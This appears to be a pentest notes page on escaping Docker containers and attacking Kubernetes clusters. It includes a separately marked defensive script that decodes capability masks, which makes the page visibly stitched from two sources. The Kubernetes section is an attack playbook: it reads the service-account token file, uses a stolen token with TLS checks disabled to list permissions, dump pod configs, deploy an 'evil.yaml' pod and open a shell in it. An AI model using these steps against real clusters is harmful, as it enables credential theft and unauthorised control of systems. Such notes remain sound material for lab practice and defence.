
Container/Sandbox Breakout

Virtual inceptions

Docker

I first check the hosts file for any cues of containerization and for other nodes on the network. You can also try running the capsh binary. If it exists, it can be used to print the current container capabilities.

cat /etc/hosts #check for a container ID like 8u9ru98432
capsh --print #check current Unix capabilities

ls -l /proc/*/ns #list the namespaces of each process

ls -al /dev/ | grep disk #check for disks
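
When capsh is not installed, the same information is in the CapEff line of /proc/self/status as a hex bitmask. The script below is an added example, not part of the original page: it decodes that mask and reports any capability beyond Docker's default set, which is the check to run when auditing how a workload was started. The function names and the two sample masks are constructed for illustration.

```sh
# Added example: decode a CapEff bitmask without capsh and list the
# capabilities a container holds beyond Docker's default set.

# Capability names in bit order (bit 0 = chown), from linux/capability.h.
CAP_NAMES="chown dac_override dac_read_search fowner fsetid kill setgid setuid
setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw
ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct
sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease
audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm
block_suspend audit_read perfmon bpf checkpoint_restore"

# CapEff of a container started with Docker's default capability set.
DEFAULT_MASK=0xa80425fb

# decode_caps HEXMASK: print the names of the capabilities set in HEXMASK.
decode_caps() {
    mask=$((0x$1)); bit=0; out=""
    for name in $CAP_NAMES; do
        if [ $(( (mask >> bit) & 1 )) -eq 1 ]; then
            out="$out${out:+ }cap_$name"
        fi
        bit=$((bit + 1))
    done
    printf '%s\n' "$out"
}

# extra_caps HEXMASK: capabilities present in HEXMASK but not in the default set.
extra_caps() {
    decode_caps "$(printf '%x' $(( 0x$1 & ~$DEFAULT_MASK )))"
}

# audit_mask LABEL HEXMASK: one report line; returns 1 if extras are present.
audit_mask() {
    extras=$(extra_caps "$2")
    if [ -z "$extras" ]; then
        printf '%s: OK, nothing beyond the Docker default set\n' "$1"
    else
        printf '%s: REVIEW, extra capabilities: %s\n' "$1" "$extras"
        return 1
    fi
}

# Constructed sample masks: a default container and a --privileged one.
audit_mask "default (constructed)" 00000000a80425fb || true
audit_mask "privileged (constructed)" 0000003fffffffff || true
# Live check of the current process, when /proc exposes CapEff.
eff=$(awk '/^CapEff:/ {print $2}' /proc/self/status 2>/dev/null || true)
if [ -n "$eff" ]; then
    audit_mask "this process" "$eff" || true
fi
```

A workload that reports extras such as cap_sys_admin was started with added capabilities or in privileged mode and should be reviewed against what it actually needs.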

Kubernetes

Try getting secrets.

cat /var/run/secrets/kubernetes.io/serviceaccount/token

List what you can do with this token

kubectl --token "$(cat token.txt)" --insecure-skip-tls-verify --server=https://team.thm:6443 auth can-i --list

Get pods & configs

kubectl get pods -o yaml \
	--server="https://kube-serv:6443" \
	--token='<Token you steal>' \
	--insecure-skip-tls-verify=true > backup.config
kubectl get pods \
	--server="https://kube-serv:6443" \
	--token='<Token you steal>' \
	--insecure-skip-tls-verify=true 

Build & Deploy

kubectl apply -f ./evil.yaml \
	--server="https://kube-server:6443" \
	--token='<token you steal>' \
	--insecure-skip-tls-verify=true 

Execute command

kubectl exec -it attacker \
	--server="https://kube-server:6443" \
	--token='<Token you steal>' \
	--insecure-skip-tls-verify=true \
	-- bash

Basic commands

kubectl version #Get client and server version
kubectl get pod
kubectl get services
kubectl get deployment
kubectl get replicaset
kubectl get secret
kubectl get all
kubectl get ingress
kubectl get endpoints

#kubectl create deployment <deployment-name> --image=<docker image>
kubectl create deployment nginx-deployment --image=nginx
#Access the configuration of the deployment and modify it
#kubectl edit deployment <deployment-name>
kubectl edit deployment nginx-deployment
#Get the logs of the pod for debugging (the output of the docker container running)
#kubectl logs <replicaset-id/pod-id>
kubectl logs nginx-deployment-84cd76b964
#kubectl describe pod <pod-id>
kubectl describe pod mongo-depl-5fd6b7d4b4-kkt9q
#kubectl exec -it <pod-id> -- bash
kubectl exec -it mongo-depl-5fd6b7d4b4-kkt9q -- bash
#kubectl describe service <service-name>
kubectl describe service mongodb-service
#kubectl delete deployment <deployment-name>
kubectl delete deployment mongo-depl
#Deploy from config file
kubectl apply -f deployment.yml

Last updated 3 years ago


https://github.com/TurboWindX/kube-hunter
https://github.com/TurboWindX/peirates